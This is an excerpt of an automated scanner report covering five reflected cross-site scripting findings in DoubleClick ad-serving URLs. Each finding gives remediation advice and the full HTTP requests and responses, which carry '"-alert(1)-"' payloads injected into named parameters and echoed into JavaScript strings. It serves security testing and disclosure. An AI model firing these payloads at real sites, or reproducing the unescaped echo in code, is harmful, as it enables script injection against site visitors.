User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:29:30 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015c4923"-alert(1)-"ebec3c9a8ba&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tra
...[SNIP]...

5.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32208"-alert(1)-"6f12c107eb7 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=207955032208"-alert(1)-"6f12c107eb7&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:28:44 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
om%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=207955032208"-alert(1)-"6f12c107eb7&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=http%3a%2f%2fwww.tdameritr
...[SNIP]...

5.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd7b5"-alert(1)-"797fb70d979 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the scanner appears to have treated everything from sz= up to the first & as the value of sz, so in the request below the payload is appended after the auctionID value inside the click-through URL rather than directly after 300x250. The label affects only where the probe was placed, not exploitability: the entire ad-call URL is attacker-supplied in a reflected attack, and the tail of the click-through URL lands in the same double-quoted literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261bd7b5"-alert(1)-"797fb70d979&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:26:43 GMT
Content-Length: 10042

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
c%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261bd7b5"-alert(1)-"797fb70d979&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed
...[SNIP]...

5.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.861

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80b32"-alert(1)-"ef983b9ef6f was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N3941.InviteMedia/B5414127.861;sz=300x250;pc=[TPAS_ID];click=http://ad.burstdirectads.com/clk?2,13%3B54d78a545d4921a5%3B12fdf91f16a,0%3B%3B%3B1644949686,T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAavGR3y8BAAAAAAAAADQ2ZDJiZGEwLTdiZGYtMTFlMC04NDMyLTI3YmU4ZjQwMDY3ZADWlQEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,$http://t.invitemedia.com/track_click?auctionID=13051259741858209-115261&campID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F80b32"-alert(1)-"ef983b9ef6f&redirectURL=;ord=1305125974? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHACU-Y0AAAAAAN8.IwAAAAAAAgAEAAIAAAAAAP8AAAAECn4bKAAAAAAAPrsfAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAKVyPwvUoFEAAAAAAAAAoQClcj8L1KBRAAAAAAAAAKEApXI.C9SgUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLJddA04gTCkxhZkKZSoLA9M5ynJbHwwXK9nkLAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBZy.S7nc%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D50493%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBZy.S7nc%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D1701219495%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,46d2bda0-7bdf-11e0-8432-27be8f40067d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:31:06 GMT
Content-Length: 9952

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mpID=80340&crID=115261&pubICode=2079550&pub=389015&partnerID=9&url=http%3A%2F%2Fnews%2Elalate%2Ecom%2F2011%2F05%2F11%2Fshingles%2Dnot%2Dpink%2Deye%2Dtony%2Dla%2Drussa%2Dhealth%2Dcondition%2Drevealed%2F80b32"-alert(1)-"ef983b9ef6f&redirectURL=http%3a%2f%2fwww.tdameritrade.com/tradearchitect.html%3Fa%3DSVI%26o%3D201%26cid%3DGENRET%3B877237%3B63592959%3B240695700%3B41964175");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

5.53. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload def7e"-alert(1)-"794b3e972bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&def7e"-alert(1)-"794b3e972bd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:03:06 GMT
Content-Length: 8031

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&def7e"-alert(1)-"794b3e972bd=1http://www.cosmopolitanlasvegas.com/stay/packages/book3-stay4.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+Book3Stay4&utm_source=Media6&utm_medium=display&utm_content=Book3Stay4&utm_campaign=DR"
...[SNIP]...

5.54. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77e7"-alert(1)-"a6981aa979f was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the request contains no & after sz=, so the scanner appears to have treated the whole remainder of the URL as the value of sz; the payload is therefore appended at the very end of the click0 tracking URL (after _url=) rather than directly after 728x90. The label affects only where the probe was placed, not exploitability: the entire ad-call URL is attacker-supplied in a reflected attack, and the tail of the tracking URL lands in the same double-quoted literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must be placed inside a JavaScript string literal, encode it for that exact context (for example, emit it as a JSON string literal and additionally escape <, > and the U+2028/U+2029 line terminators as \uXXXX sequences) so that a " in the input cannot terminate the literal and a </script> sequence cannot terminate the enclosing script element. HTML entity encoding is not a substitute: entities are not decoded inside a script element, so it would corrupt the value without producing a correct literal.

Request

GET /adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=d77e7"-alert(1)-"a6981aa979f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2;sz=728x90;ord=1305126978057;click0=http://ad.media6degrees.com/adserv/clk?tId=17180881204288983|cId=6485|cb=1305126976|notifyPort=8080|exId=22|tId=17180881204288983|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd102.media6.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track1000.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:02:26 GMT
Content-Length: 8065

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AADvUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=d77e7"-alert(1)-"a6981aa979fhttp://www.cosmopolitanlasvegas.com/stay/packages/room-for-three.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+RoomforThree&utm_source=Media6&utm_medium=display&utm_content=RoomforThree&utm_campaig
...[SNIP]...

